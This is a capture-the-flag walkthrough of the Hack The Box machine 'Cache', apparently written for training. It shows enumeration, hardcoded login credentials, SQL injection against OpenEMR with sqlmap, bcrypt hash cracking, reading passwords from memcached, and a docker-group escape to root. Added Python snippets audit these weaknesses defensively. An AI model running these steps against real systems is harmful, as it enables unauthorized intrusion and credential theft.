Hack The Box - Cache


We are going to pwn Cache from Hack The Box.

Link: https://www.hackthebox.eu/home/machines/profile/251

Let's begin with our initial Nmap scan.

Nmap Scan Results:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


It's a normal webpage containing information about hacking. Nothing much.


There is a login page. Before trying any SQLi, I decided to run GoBuster.


GoBuster Scan Results:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/05/19 09:30:09 Starting gobuster
/javascript (Status: 301)
/jquery (Status: 301)
/server-status (Status: 403)
2020/05/19 10:58:27 Finished

Under /jquery there is a JS file.


This file reveals the username and password of the login page.

    var error_correctPassword = false;
    var error_username = false;

    /* Both checks compare against literal credentials in the browser,
       so the username and password ship to every visitor. */
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }

    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }

    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
        error_username = false;
        checkCorrectPassword();
        checkCorrectUsername();

        /* submit only when neither check set its error flag */
        if(error_correctPassword == false && error_username == false){
            return true;
        }
        return false;
    });

So I'm logged in with ash : H@v3_fun.


The page is still under construction, so this is a dead end.

While reading about the author, I learned he has another project like Cache called HMS, so I added hms.htb to /etc/hosts.


It's an OpenEMR login page.


GoBuster Scan Results:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://hms.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/05/19 10:53:59 Starting gobuster
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin.php (Status: 200)
/common (Status: 301)
/config (Status: 301)
/contrib (Status: 301)
/controllers (Status: 301)
/custom (Status: 301)
/images (Status: 301)
/index.php (Status: 302)
/interface (Status: 301)
/javascript (Status: 301)
/library (Status: 301)
/LICENSE (Status: 200)
/modules (Status: 301)
/portal (Status: 301)
/public (Status: 301)
/server-status (Status: 403)
/services (Status: 301)
/sites (Status: 301)
/sql (Status: 301)
/templates (Status: 301)
/tests (Status: 301)
/vendor (Status: 301)
2020/05/19 10:55:46 Finished



It reveals the version of OpenEMR, so I decided to search for exploits.


There is a reference YouTube link.



Following the video:

Fill in the details.

Log in.

Now click Register.

Change the URL.

Here it throws a MySQL error.

I captured the request in Burp and saved it as request.r. Now time for SQLMap.


There are 2 databases, but openemr seems interesting.

I dumped the tables of the database.


I dumped the users_secure table.

Getting Shell as www-data:


Database: openemr
Table: users_secure
[1 entry]
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |

I cracked the hash using John:

root@w0lf:~/CTF/HTB/Boxes/Cache# john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-19 13:41) 1.694g/s 1464p/s 1464c/s 1464C/s caitlin..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
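
Why the crack finished in under a second comes down to the hash's work factor. As an added example (mine, not part of the original writeup), this Python parses the openemr_admin bcrypt string from the dump above, derives the iteration count John reported, and flags a cost below 10, which is the audit threshold I am assuming here.

```python
import re

# bcrypt modular-crypt format, 60 characters in total:
#   $<ident>$<cost>$<22-char salt><31-char digest>
# salt and digest use bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Assumed audit threshold: the minimum work factor commonly recommended today.
RECOMMENDED_MIN_COST = 10


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raise ValueError if malformed."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % hash_str)
    ident, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost out of range: %d" % cost)
    return {
        "ident": ident,
        "cost": cost,
        # key-setup rounds = 2**cost; John prints this as "Cost 1 (iteration count)"
        "iterations": 2 ** cost,
        "salt": salt,
        "digest": digest,
    }


def audit_bcrypt(hash_str, min_cost=RECOMMENDED_MIN_COST):
    """Return (is_weak, message) for a stored bcrypt hash."""
    info = parse_bcrypt(hash_str)
    if info["cost"] < min_cost:
        slowdown = 2 ** (min_cost - info["cost"])
        return True, ("cost %d (%d iterations) is below %d; each guess would be "
                      "%dx more expensive at the minimum"
                      % (info["cost"], info["iterations"], min_cost, slowdown))
    return False, "cost %d meets the minimum of %d" % (info["cost"], min_cost)


# The openemr_admin hash from the users_secure dump above.
OPENEMR_ADMIN_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

if __name__ == "__main__":
    weak, message = audit_bcrypt(OPENEMR_ADMIN_HASH)
    print(("WEAK: " if weak else "OK: ") + message)
```

The iteration count it derives (32) is the same number John printed as "Cost 1 (iteration count)".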


Getting User Ash:

There are 2 users, ash and luffy, and we already found ash's password, so why don't we try su.

Before doing that make sure you have a stable shell.

ash : H@v3_fun worked.

www-data@cache:/var/www/hms.htb/public_html$ python3 -c 'import pty; pty.spawn("/bin/sh")'
<html$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ su ash
su ash
Password: H@v3_fun

ash@cache:/var/www/hms.htb/public_html$ cd /home
cd /home
ash@cache:/home$ cd ash
cd ash
ash@cache:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  user.txt
ash@cache:~$ cat user.txt
cat user.txt

Getting User Luffy:

There is an unusual port listening inside the machine: port 11211.

ash@cache:/home$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                      
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 *                           -

I googled the port and learned it's memcached.

Memcached is a general-purpose distributed memory-caching system.

Reference : https://www.hackingarticles.in/penetration-testing-on-memcached-server/


stats items reveals slab ID 1, so we can dump it using stats cachedump 1 0.

Here 1 and 0 are the parameters: 1 is the slab ID, and 0 is the number of keys to dump, where 0 dumps all the keys present in that slab.
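
To make the slab ID and the count concrete, here is an added Python example (mine, not the writeup's or the reference article's) that parses the two memcached text-protocol responses involved: the stats items output the slab ID comes from, and the ITEM lines that stats cachedump returns. The sample responses are constructed in the shape memcached uses, not the box's real data.

```python
import re

# "stats items" answers with lines "STAT items:<slab>:<name> <value>", then "END".
STAT_ITEMS_RE = re.compile(r"^STAT items:(\d+):(\w+) (\d+)$")
# "stats cachedump <slab> <limit>" answers with "ITEM <key> [<size> b; <expiry> s]", then "END".
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")


def parse_stats_items(response):
    """Return {slab_id: {stat_name: value}} from a 'stats items' response."""
    slabs = {}
    for line in response.splitlines():
        m = STAT_ITEMS_RE.match(line.strip())
        if m:
            slab, name, value = m.groups()
            slabs.setdefault(int(slab), {})[name] = int(value)
    return slabs


def parse_cachedump(response):
    """Return [(key, size_bytes, expiry_epoch)] from a 'stats cachedump' response.

    An expiry of 0 means the item never expires.
    """
    items = []
    for line in response.splitlines():
        m = ITEM_RE.match(line.strip())
        if m:
            key, size, expiry = m.groups()
            items.append((key, int(size), int(expiry)))
    return items


# Constructed sample responses (shape only; values are made up).
SAMPLE_STATS_ITEMS = "STAT items:1:number 3\nSTAT items:1:age 1200\nSTAT items:1:evicted 0\nEND\n"
SAMPLE_CACHEDUMP = "ITEM user [5 b; 0 s]\nITEM passwd [9 b; 0 s]\nITEM link [21 b; 0 s]\nEND\n"

if __name__ == "__main__":
    for slab_id, stats in parse_stats_items(SAMPLE_STATS_ITEMS).items():
        # the slab number here is the first parameter; 0 as the second means "all keys"
        print("slab %d holds %d item(s): stats cachedump %d 0" % (slab_id, stats["number"], slab_id))
    for key, size, expiry in parse_cachedump(SAMPLE_CACHEDUMP):
        print("key=%s size=%dB expiry=%s" % (key, size, "never" if expiry == 0 else expiry))
```

Memcached performs no authentication, so anything stored in it is readable by every process that can reach the socket; the fix is keeping credentials out of the cache, not hiding the dump command.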

I got luffy's password: 0n3_p1ec3.

ash@cache:/home$ su luffy
su luffy
Password: 0n3_p1ec3

luffy@cache:/home$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Privilege Escalation:

I ran my Linux enumeration script, and it reveals that luffy is in the docker group.

In this case, the user can run a light container with /etc mounted in and then get root access in the container.

GTFOBins says the same thing: the user must be in the docker group, and it also tells us how to get an interactive shell.

I already had the image ID from my enumeration script, so:

luffy@cache:/home/ash$ docker run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh
< run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh
# whoami
# cd /root
cd /root
# ls
# cat root.txt
cat root.txt
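
The defensive counterpart to this step, as an added Python example that is not part of the writeup: an audit that lists every account holding the docker GID, whether as a supplementary member (luffy's case in the id output above) or as a primary group, since each of them can reach root the same way. The /etc/group and /etc/passwd excerpts are constructed; only the GID 999 and luffy's membership are taken from the page.

```python
# Membership in 'docker' lets a user mount the host filesystem into a container,
# so every member should be reviewed as a root-equivalent account.

def parse_group(group_text):
    """Return {group_name: (gid, [members])} from /etc/group content."""
    groups = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def parse_passwd(passwd_text):
    """Return {user_name: primary_gid} from /etc/passwd content."""
    users = {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def docker_group_members(group_text, passwd_text, group="docker"):
    """Users holding the docker GID as primary group or as a supplementary member."""
    groups = parse_group(group_text)
    if group not in groups:
        return []
    gid, supplementary = groups[group]
    primary = [u for u, g in parse_passwd(passwd_text).items() if g == gid]
    return sorted(set(supplementary) | set(primary))


# Constructed excerpts: docker GID 999 and luffy's membership mirror the id output
# above; the 'ci' account (primary GID 999) is made up to show the second case.
SAMPLE_GROUP = "root:x:0:\ndocker:x:999:luffy\nash:x:1000:\nluffy:x:1001:\n"
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "ash:x:1000:1000::/home/ash:/bin/bash\n"
    "luffy:x:1001:1001::/home/luffy:/bin/bash\n"
    "ci:x:1002:999::/srv/ci:/bin/sh\n"
)

if __name__ == "__main__":
    for user in docker_group_members(SAMPLE_GROUP, SAMPLE_PASSWD):
        print("%s: member of docker, review as root-equivalent" % user)
```

Run against the real files (open("/etc/group").read(), open("/etc/passwd").read()) the same function gives the list to compare against who is actually meant to administer the daemon.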

We own the box.